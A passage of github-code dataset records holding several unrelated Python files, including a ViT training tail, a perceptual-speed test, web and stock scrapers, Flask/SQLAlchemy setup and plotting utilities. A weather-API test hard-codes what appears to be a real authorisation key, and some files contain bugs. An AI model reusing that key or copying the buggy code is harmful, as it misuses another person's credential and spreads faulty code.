model(imgs.to(device))\n\n test_hit += (logits.argmax(dim=-1) == labels.to(device)).sum()\n\ntest_acc = test_hit / len(valid_dataset)\nprint(f\"Testing Acc = {test_acc:.4f}\")\n", "repo_name": "yiwei32/NTU_courses", "sub_path": "2021_Fall/DLCV/hw3/p1_train.py", "file_name": "p1_train.py", "file_ext": "py", "file_size_in_byte": 4231, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "random.seed", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.manual_seed", "line_number": 17, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "torchvision.transforms.Compose", "line_number": 34, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 34, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomRotation", "line_number": 35, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 35, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomResizedCrop", "line_number": 36, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 36, "usage_type": "name"}, {"api_name": "torchvision.transforms.ColorJitter", "line_number": 37, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 37, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 38, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 38, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 39, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 39, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", 
"line_number": 41, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 41, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 42, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 42, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 43, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 43, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 44, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 44, "usage_type": "name"}, {"api_name": "p1_dataset.p1_data", "line_number": 47, "usage_type": "call"}, {"api_name": "p1_dataset.p1_data", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 55, "usage_type": "attribute"}, {"api_name": "pytorch_pretrained_vit.ViT", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 62, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 64, "usage_type": "name"}, {"api_name": "torch.save", "line_number": 116, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 116, "usage_type": "call"}, {"api_name": "os.path", "line_number": 116, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "torch.no_grad", "line_number": 132, "usage_type": "call"}]} +{"seq_id": "38143746710", "text": "from random import choice, choices, randint\r\nfrom datetime import datetime\r\nfrom json import load\r\nfrom fpdf import FPDF\r\n\r\n\r\ndef print_report_to_pdf(pdf, report):\r\n \"\"\" Function which writes the data from report in pdf file.\"\"\"\r\n table_cell_width = 30\r\n table_cell_height = 5\r\n pdf.set_font('Times', '', 10)\r\n column_names = report[0].keys()\r\n\r\n for column in column_names:\r\n pdf.cell(table_cell_width, table_cell_height, column, align='C', border=1)\r\n pdf.ln(table_cell_height)\r\n 
pdf.set_font('Times', '', 10)\r\n\r\n for line in report:\r\n for column in column_names:\r\n if line[\"Correct answer\"] != line[\"User choice\"]:\r\n pdf.set_font('Times', 'B', 10)\r\n if column == \"Correct answer\":\r\n pdf.set_text_color(0, 255, 0)\r\n elif column == \"User choice\":\r\n pdf.set_text_color(255, 0, 0)\r\n else:\r\n pdf.set_text_color(0, 0, 0)\r\n else:\r\n pdf.set_font('Times', '', 10)\r\n pdf.set_text_color(0, 0, 0)\r\n value = str(line[column])\r\n if column == 'Letters':\r\n table_cell_height = 5\r\n x = pdf.get_x()\r\n y = pdf.get_y()\r\n pdf.multi_cell(table_cell_width, table_cell_height, value, align='C', border=1)\r\n pdf.set_xy(x + table_cell_width, y)\r\n else:\r\n table_cell_height = 10\r\n pdf.cell(table_cell_width, table_cell_height, value, align='C', border=1)\r\n pdf.ln(table_cell_height)\r\n\r\n\r\nclass PerceptualSpeed:\r\n def __init__(self):\r\n with open('resources/letters.json') as letters_file:\r\n self.letters = load(letters_file)\r\n self.upper_row = []\r\n self.lower_row = []\r\n self.report = []\r\n self.questions = 0\r\n self.answer = 0\r\n self.user_answer = 0\r\n self.score = 0\r\n\r\n def choice_letters(self):\r\n \"\"\" Generate a pair of random letters.\"\"\"\r\n letter = choice(list(self.letters.keys()))\r\n letter_weights = [1 for _ in range(0, len(list(self.letters.keys())))]\r\n for character in self.letters[letter]:\r\n index = list(self.letters.keys()).index(character)\r\n letter_weights[index] += 19\r\n letter_weights[list(self.letters.keys()).index(letter)] += 34\r\n pair_letter = choices(list(self.letters.keys()), weights=letter_weights, k=1)\r\n # print(letter, pair_letter[0])\r\n return [letter, pair_letter[0]]\r\n\r\n def get_letters(self):\r\n \"\"\" Generate 4 pairs of letters. \"\"\"\r\n self.upper_row = []\r\n self.lower_row = []\r\n while len(self.upper_row) < 4:\r\n pair = self.choice_letters()\r\n if pair[0] not in self.upper_row and pair[1] not in self.lower_row:\r\n self.upper_row.append(pair[0])\r\n self.lower_row.append(pair[1])\r\n self.questions += 1\r\n if randint(0, 1) == 0:\r\n self.upper_row = [letter.upper() for letter in self.upper_row]\r\n else:\r\n self.lower_row = [letter.upper() for letter in self.lower_row]\r\n\r\n def find_answer(self):\r\n \"\"\" Find the number of matching letter pairs.\"\"\"\r\n self.answer = 0\r\n for index in range(4):\r\n if self.upper_row[index].lower() == self.lower_row[index].lower():\r\n self.answer += 1\r\n\r\n def check_answer(self, user_choice):\r\n \"\"\" Check if user has guessed the correct answer. It adds the exercise to the report.\"\"\"\r\n self.user_answer = user_choice\r\n self.add_report()\r\n if self.answer == self.user_answer:\r\n return True\r\n return False\r\n\r\n def add_report(self):\r\n \"\"\" Insert the question with the correct answer and the user's choice\r\n inside a report list.\r\n \"\"\"\r\n letters = f\"{self.upper_row[0]} {self.upper_row[1]} {self.upper_row[2]}\" \\\r\n f\" {self.upper_row[3]}\\n{self.lower_row[0]} {self.lower_row[1]}\" \\\r\n f\" {self.lower_row[2]} {self.lower_row[3]}\"\r\n self.report.append({\"Question No\": self.questions, \"Letters\": letters,\r\n \"Correct answer\": self.answer, \"User choice\": self.user_answer})\r\n\r\n def save_report(self):\r\n \"\"\" Saves the report of this test in a .pdf file. 
\"\"\"\r\n time_now = datetime.now()\r\n time_format = \"%d/%m/%Y %H:%M\"\r\n date_time = time_now.strftime(time_format)\r\n\r\n pdf = FPDF()\r\n pdf.add_page()\r\n pdf.set_font('Times', 'B', 16)\r\n pdf.cell(195, 10, 'PERCEPTUAL SPEED TEST REPORT', 0, 1, 'C')\r\n pdf.cell(195, 10, date_time, 0, 1, 'C')\r\n pdf.cell(195, 10, f\"Score: {self.score}/{self.questions - 1}\", 0, 1, 'C')\r\n pdf.ln(10)\r\n\r\n print_report_to_pdf(pdf, self.report)\r\n\r\n time_format = \"%H-%M_%d-%m-%Y\"\r\n date_time = time_now.strftime(time_format)\r\n pdf.output(f'reports/{date_time}_perceptual_speed_report.pdf', 'F')\r\n self.report.clear()\r\n", "repo_name": "DanielM24/GIA-Practice-Tests", "sub_path": "perceptual_speed.py", "file_name": "perceptual_speed.py", "file_ext": "py", "file_size_in_byte": 5106, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "json.load", "line_number": 48, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 59, "usage_type": "call"}, {"api_name": "random.choices", "line_number": 65, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 79, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 111, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 111, "usage_type": "name"}, {"api_name": "fpdf.FPDF", "line_number": 115, "usage_type": "call"}]} +{"seq_id": "29719035240", "text": "\n\n\nimport threading\nimport cv2\nimport numpy as np\n\ndef sub(obj, ROI):\n np.copyto(ROI[:,:,0],obj.apply(ROI, None, -1))\n\nfgbg = cv2.createBackgroundSubtractorKNN(100, 500, False)\n\nthreadcount = 10\nthreads = []\ndata = []\n\nfor x in range(threadcount):\n data.append((255 * np.random.rand(320, 200, 1)).astype(dtype=\"uint8\"))\n threads.append(threading.Thread(target=sub, args=[fgbg, data[x]]))\n\n# Start them all\nfor thread in threads:\n thread.start()\n\n# Wait for all to complete\nfor thread in threads:\n thread.join()\n\nprint()\n\n\n", "repo_name": "janssenda/test-async-py", "sub_path": "complex-process.py", "file_name": "complex-process.py", "file_ext": "py", "file_size_in_byte": 537, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.copyto", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.createBackgroundSubtractorKNN", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 18, "usage_type": "attribute"}, {"api_name": "threading.Thread", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "36622721246", "text": "from bs4 import BeautifulSoup\nimport requests\nfrom PIL import Image\nfrom io import BytesIO\nimport os\n\ndef startSearch():\n ##Initialize the search\n search = input('Search for:')\n params = {'q': search}\n ##Replaces spaces with unnderscores for url search\n dir_name = search.replace(' ', '_').lower()\n ##If a directory with the search term doesnt exist, make a directory for it\n if not os.path.isdir(dir_name):\n os.makedirs(dir_name)\n ## Get the url plugging in the provided search term as the parameter\n r = requests.get('http://www.bing.com/images/search', params=params)\n # Intialize the HTML soup\n soup = BeautifulSoup(r.text, 'html.parser')\n ## Parse the soup for all a tags with a class of thumb\n links = soup.findAll('a', {'class': 'thumb'})\n\n for item in links:\n try:\n ## Get the link of each a tag\n 
img_obj = requests.get(item.attrs['href'])\n print(\"getting\", item.attrs['href'])\n title = item.attrs['href'].split('/')[-1]\n try:\n ## Get the image inside of the a tag\n img = Image.open(BytesIO(img_obj.content))\n ## Save that image in the directory\n img.save('./' + dir_name + '/' + title, img.format)\n except:\n print('could not save image')\n except:\n print(\"could not request Image\")\n startSearch()\n\n## Initialize the search by calling the function\nstartSearch()\n\n", "repo_name": "cirrusm/web-scraper", "sub_path": "images.py", "file_name": "images.py", "file_ext": "py", "file_size_in_byte": 1488, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.isdir", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 15, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 17, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 19, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 26, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 31, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 31, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "35221357611", "text": "import pytest\nimport requests\n\ndef test_weather_correct():\n url = \"https://opendata.cwb.gov.tw/api/v1/rest/datastore/F-D0047-061?Authorization=CWB-E0CBEB14-87B4-49A9-A4CA-A3240E63E9F4\"\n\n # 執行 API 呼叫並取得回應\n response = fetch_weather_data(url)\n\n # 確認回應的狀態碼為 200 (表示成功)\n assert response.status_code == 200\n\n # 確認回應的 JSON 資料中包含了 'records'、'locations' 和 'location' 的項目\n assert 'records' in response.json()\n assert 'locations' in response.json()['records']\n assert 'location' in response.json()['records']['locations'][0]\n\n # 取得文山區的資料\n locations = response.json()['records']['locations'][0]['location']\n wen_location = [x for x in locations if x['locationName'] == '文山區'][0]\n\n # 確認回應的 JSON 資料中包含了 'weatherElement' 的項目\n assert 'weatherElement' in wen_location\n\n # 取得天氣描述的資料\n elementNames = wen_location['weatherElement']\n WeatherDescription_elementName = [x for x in elementNames if x['elementName'] == 'WeatherDescription'][0]\n\n # 確認回應的 JSON 資料中包含了 'time' 的項目\n assert 'time' in WeatherDescription_elementName\n\n # 取得時間描述的資料\n time_descs = WeatherDescription_elementName['time']\n\n # 確認時間描述資料不為空\n assert len(time_descs) > 0\n\ndef fetch_weather_data(url):\n response = requests.get(url)\n return response\n", "repo_name": "yuu0223/FastAPI_Backend", "sub_path": "my-app/tests/test_weather.py", "file_name": "test_weather.py", "file_ext": "py", "file_size_in_byte": 1476, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "4114073938", "text": "import sys\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\n\nfrom flask import Flask\nfrom flask_jsglue import JSGlue\nfrom flask_sqlalchemy_session import flask_scoped_session\n\n\ndef create_app():\n app = Flask(__name__)\n\n db_session = init_db(app)\n\n jsglue = JSGlue()\n jsglue.init_app(app)\n\n from main import bp as main_bp\n app.register_blueprint(main_bp)\n\n return app\n\n\ndef init_db(app):\n from db import Base\n engine = create_engine(url='sqlite:///./db.sqlite', 
convert_unicode=True, connect_args={})\n session_factory = sessionmaker(autocommit=False, autoflush=False, bind=engine)\n\n try:\n Base.metadata.create_all(bind=engine)\n except Exception as e:\n print(\"Cannot create DB, because: \", str(e), file=sys.stderr)\n\n db_session = flask_scoped_session(session_factory, app)\n Base.query = db_session.query_property()\n return db_session\n\n\nif __name__ == '__main__':\n app = create_app()\n app.run(debug=True, host='127.0.0.1', port=2000)\n", "repo_name": "Discyo/Discyo-WebInterface", "sub_path": "web_interface/app/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 1024, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 11, "usage_type": "call"}, {"api_name": "flask_jsglue.JSGlue", "line_number": 15, "usage_type": "call"}, {"api_name": "main.bp", "line_number": 19, "usage_type": "argument"}, {"api_name": "sqlalchemy.create_engine", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 27, "usage_type": "call"}, {"api_name": "db.Base.metadata.create_all", "line_number": 30, "usage_type": "call"}, {"api_name": "db.Base.metadata", "line_number": 30, "usage_type": "attribute"}, {"api_name": "db.Base", "line_number": 30, "usage_type": "name"}, {"api_name": "sys.stderr", "line_number": 32, "usage_type": "attribute"}, {"api_name": "flask_sqlalchemy_session.flask_scoped_session", "line_number": 34, "usage_type": "call"}, {"api_name": "db.Base.query", "line_number": 35, "usage_type": "attribute"}, {"api_name": "db.Base", "line_number": 35, "usage_type": "name"}]} +{"seq_id": "43180279402", "text": "\"\"\"\r\n\r\nBusiness logic:\r\n\r\n1. scrape code from the web by HTTP request \r\n2. For loop with code in pandas to get data \r\n3. Save it in table and send to database (Or excel) ... storing the code status: append code into code \r\n\r\n# for append being pass to pandas and show in tables\r\n\r\n\"\"\"\r\n\r\n# 1. Scraping Teams\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport string\r\nimport re\r\n\r\n\r\n# 2. Accessing Stock data\r\nfrom datetime import datetime, timedelta\r\nimport pandas_datareader.data as web\r\n\r\n# 3. Forming DataFrame\r\nimport pandas as pd\r\n\r\n#-----------------------------------------------------------------------------------------------\r\n\r\n\r\n# Part 1: Getting the US Stock Code \r\n\r\ncodes = [] # store codes\r\nletters = list(string.ascii_uppercase) # Setting A-Z letter list \r\n\r\nprint(\"\\033[1;32;1m Executing Mission 1 ... \\033[0m\\n\") # Green color for signal\r\n\r\nfor letter in letters:\r\n url = f\"https://eoddata.com/stocklist/NASDAQ/{letter}.htm\" # Capital A-Z according to web's pattern\r\n req = requests.get(url)\r\n soup = BeautifulSoup(req.content, 'lxml') # turn into DOM structure\r\n \r\n # filter with special pattern: stockquote/NASDAQ/...\r\n tags = soup.find_all(\"a\", href=re.compile(\"/stockquote/NASDAQ/\")) # regular expression for specified searching \r\n\r\n for t in tags: \r\n if (t.string is not None):\r\n codes.append(t.string)\r\n \r\nprint(\"\\033[1;32;1m Mission 1 Complete ! 
\\033[0m\\n\") \r\n\r\n#-----------------------------------------------------------------------------------------------\r\n\r\n# Part 2: Access data from pandas\r\n\r\ncount = 0 # successful searching\r\nerrorCount = 0 # fail searching\r\n\r\nendDate = datetime.now() # Current time system (your computer)\r\nstartDate = endDate - timedelta(days=1) # Two days before current (your computer)\r\n\r\nstr_endDate = endDate.strftime(\"%Y-%m-%d\") # date obj. to string \r\nstr_startDate = startDate.strftime(\"%Y-%m-%d\") \r\nerrorCode = [] # append to list\r\n\r\ncodeStatus = { # Open, close, and volume\r\n \"code\": [],\r\n \"date\": [],\r\n \"codeOpen ($)\": [],\r\n \"codeClose ($)\": [],\r\n \"codeVolume\": []\r\n }\r\n\r\nprint(\"\\033[1;32;1m Executing Mission 2 ... \\033[0m\\n\")\r\n\r\nfor code in codes:\r\n try:\r\n data = web.DataReader(code, \"yahoo\", str_startDate, str_endDate) # Stock_code, search_engine, start_date, end_date\r\n # 要最新果日 (SCRARPE TIME: 香港時間 2022/01/29 01:20 AM, 但用\"2022-01-28\", \"2022-01-29\" 會顯示出27, 28 日的價(可能是時差問題))\r\n \r\n # Attracting the number of rows from the dataset\r\n for i in range(data.shape[0]): # according to its number of row\r\n stockDate = data.index[i].strftime(\"%Y-%m-%d\") # newly added, maybe wrong\r\n stockOpen = data[\"Open\"][i]\r\n stockClose = data[\"Close\"][i]\r\n stockVolume = data[\"Volume\"][i]\r\n \r\n codeStatus[\"code\"].append(code)\r\n codeStatus[\"date\"].append(stockDate)\r\n codeStatus[\"codeOpen ($)\"].append(stockOpen)\r\n codeStatus[\"codeClose ($)\"].append(stockClose)\r\n codeStatus[\"codeVolume\"].append(stockVolume)\r\n \r\n print(f\" Successful: {code}\")\r\n \r\n except:\r\n print(f\"\\033[1;31m Has probelems on -----{code} \\033[0m\") # red color for fail \r\n errorCode.append(code)\r\n \r\n \r\nprint(\"\\033[1;32;1m Mission 2 Complete ! \\033[0m\\n\")\r\n\r\n#----------------------------------------------------------------------------------------------\r\n\r\n# Part 3: Convert Dict to DataFrame and export to CSV file\r\n\r\nprint(\"\\033[1;32;1m Executing Mission 3 ... \\033[0m\\n\")\r\n\r\ndf = pd.DataFrame(codeStatus)\r\ndf.to_csv(f\"stockList_{str_endDate}.csv\", index=False)\r\n# df.to_excel(f\"stockList_{str_endDate}.xlsx\", index=False) // If you want to save as excel\r\n\r\n\r\nprint(f\"Number of stock access: {count}\")\r\nprint(f\"Number of error encounter while scraping: {len(errorCount)}\")\r\nprint(errorCount) \r\n \r\n\r\nprint(\"\\033[1;32;1m Mission 3 Complete ! \\033[0m\\n\")\r\nprint(\"\\033[1;32;1m Finish !!! 
\\033[0m\\n\")\r\n\r\n# --------------------------------------------------------------------------------------------------\r\n\r\n\"\"\"\r\nCREATE TABLE StockObservation (\r\n id INT PRIMARY KEY AUTO INCREMENT,\r\n Date TIMESTAMP, \r\n OpenPrice DOUBLE,\r\n ClosePrice DOUBLE,\r\n VOLUME INT\r\n)\r\n\r\nSELECT * FROM StockObservation WHERE ....\r\n\"\"\"\r\n", "repo_name": "kcwu229/Investment-Analysis-Program-BetaStock", "sub_path": "Algorithmic Trading Project/Application.py", "file_name": "Application.py", "file_ext": "py", "file_size_in_byte": 4798, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "string.ascii_uppercase", "line_number": 33, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 39, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 40, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 43, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 58, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 58, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 59, "usage_type": "call"}, {"api_name": "pandas_datareader.data.DataReader", "line_number": 77, "usage_type": "call"}, {"api_name": "pandas_datareader.data", "line_number": 77, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 108, "usage_type": "call"}]} +{"seq_id": "70010032487", "text": "from uuid import UUID, uuid4\nfrom enum import StrEnum, auto\n\nfrom sqlalchemy import Uuid, ForeignKey\nfrom sqlalchemy.orm import DeclarativeBase, Mapped, mapped_column, relationship\n\nclass Base(DeclarativeBase):\n pass\n\nclass Alcohol(StrEnum):\n VODKA = auto()\n WHISKEY = auto()\n RUM = auto()\n GIN = auto()\n TEQUILA = auto()\n BRANDY = auto()\n LIQUEUR = auto()\n\nclass Drink(Base):\n __tablename__ = \"drinkEntity\"\n\n id: Mapped[Uuid] = mapped_column(primary_key=True, defaul=uuid4)\n base_drink: Mapped[list[Alcohol]] = mapped_column()\n name: Mapped[str] = mapped_column()\n component_ids: Mapped[list[UUID]] = mapped_column(ForeignKey(\"componentEntity.id\"))\n drinks: Mapped[\"Component\"] = relationship(back_populates=\"components\")\n \nclass Component(Base):\n __tablename__ = \"componentEntity\"\n\n id: Mapped[Uuid] = mapped_column(primary_key=True, defaul=uuid4)\n components: Mapped[\"Drink\"] = relationship(back_populates=\"drinks\")\n", "repo_name": "Chrosto9/mixology", "sub_path": "mixology-api/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 973, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlalchemy.orm.DeclarativeBase", "line_number": 7, "usage_type": "name"}, {"api_name": "enum.StrEnum", "line_number": 10, "usage_type": "name"}, {"api_name": "enum.auto", "line_number": 11, "usage_type": "call"}, {"api_name": "enum.auto", "line_number": 12, "usage_type": "call"}, {"api_name": "enum.auto", "line_number": 13, "usage_type": "call"}, {"api_name": "enum.auto", "line_number": 14, "usage_type": "call"}, {"api_name": "enum.auto", "line_number": 15, "usage_type": "call"}, {"api_name": "enum.auto", "line_number": 16, "usage_type": "call"}, {"api_name": "enum.auto", "line_number": 17, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.Mapped", "line_number": 22, "usage_type": "name"}, {"api_name": "sqlalchemy.Uuid", "line_number": 22, "usage_type": "name"}, {"api_name": 
"sqlalchemy.orm.mapped_column", "line_number": 22, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 22, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Mapped", "line_number": 23, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.mapped_column", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.Mapped", "line_number": 24, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.mapped_column", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.Mapped", "line_number": 25, "usage_type": "name"}, {"api_name": "uuid.UUID", "line_number": 25, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.mapped_column", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.ForeignKey", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.Mapped", "line_number": 26, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.relationship", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.Mapped", "line_number": 31, "usage_type": "name"}, {"api_name": "sqlalchemy.Uuid", "line_number": 31, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.mapped_column", "line_number": 31, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 31, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Mapped", "line_number": 32, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.relationship", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "32824013431", "text": "from __future__ import print_function\nimport utilities as DDM17\nimport pandas as pd\nimport sqlite3 as lite\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef read_visualisation_data():\n \"\"\"\n Read in the visualisation data from the database using Pandas\n\n Returns\n -------\n table_names : list\n A list of table names (or data set names)\n data : dict\n A dictionary of tables. The top-level key is the name of the data\n set. (Set1, Set2 etc.). The value of this is a pandas table with\n keys x & y. So data['Set1'] is a pandas table for instance.xs\n\n\n \"\"\"\n\n db = 'ThirteenDatasets.db'\n con = lite.connect(db)\n\n # Get the tables.\n rows = con.execute('SELECT name FROM sqlite_master WHERE type=\"table\"')\n table_names = [row[0] for row in rows]\n\n # Now loop over these and create a dict with each set.\n data = dict()\n for tname in table_names:\n t = pd.read_sql_query(\"Select x, y From {0}\".format(tname), con)\n data[tname] = t\n\n con.close()\n \n # I return both the list of table names and the\n # data dictionary mostly for convenience. \n return table_names, data\n\n\ndef data_to_pandas_df(tnames, data):\n \"\"\"Convert data dict to pandas data frame\n\n This routine takes the data dictionary from read_visualisation_data\n and creates a Pandas data frame with x & y as keys as well as a column\n with the dataset name\n\n Parameters\n ----------\n tnames : list\n A list of names of the tables to include. 
Normally taken to be \n the output of read_visualisation_data\n data : dict\n A dict with the data, each dataset indexed by the table name.\n This is the format returned by read_visualisation_data\n \"\"\"\n\n # Since the datasets here have the same length, I could\n # create the arrays first and then populate them - that\n # would be faster and I would avoid the asarray gymnastics\n # below to keep it as numpy arrays.\n #\n # But numpy append is fine for this.\n\n dataset = []\n first = True\n for i, tn in enumerate(tnames):\n xcoord = np.asarray(data[tn]['x'].data)\n ycoord = np.asarray(data[tn]['y'].data)\n if (first):\n x = xcoord.copy()\n y = ycoord.copy()\n first = False\n else:\n x = np.append(x, xcoord)\n y = np.append(y, ycoord)\n\n # Append the table name for each x value\n label = [tn for i in range(len(xcoord))]\n dataset = dataset + label\n\n df = pd.DataFrame({'x': x, 'y': y, 'set': dataset})\n\n return df\n \ndef show_visualisations_multipanel(tnames, data):\n \"\"\"\n Show 2D visualisations for the data\n\n Parameters\n ----------\n tnames : list\n A list of names of the tables to plot. Normally taken to be \n the output of read_visualisation_data\n data : dict\n A dict with the data, each dataset indexed by the table name.\n This is the format returned by read_visualisation_data\n \n \"\"\"\n\n nx = 5\n ny = 3\n fig, axes = plt.subplots(ncols=nx, nrows=ny, figsize=(12, 8),\n sharex=True, sharey=True)\n plt.tick_params(axis='both', which='major', labelsize=8)\n dims = axes.shape\n print(\"Axes shape=\", dims)\n for i, tn in enumerate(tnames):\n x, y = data[tn]['x'], data[tn]['y']\n\n i_x, i_y = np.unravel_index(i, dims)\n axes[i_x, i_y].scatter(x, y, 10)\n axes[i_x, i_y].text(0.95, 0.93, tn, \n transform=axes[i_x, i_y].transAxes, ha='right', va='top')\n axes[i_x, i_y].set_xlim(0, 120)\n axes[i_x, i_y].set_ylim(0, 120)\n \n axes[2, 3].set_axis_off()\n axes[2, 4].set_axis_off()\n\n # I also want to remove white-space between the panels\n fig.subplots_adjust(hspace=0)\n plt.show()\n\n\ndef get_statistics(tnames, data):\n \"\"\"Calculate basic statistics for the data\n\n The data is assumed to be a dictionary returned from read_visualisation_data() \n \"\"\"\n\n # I know the number of data sets so I can make a set\n # of result arrays. 
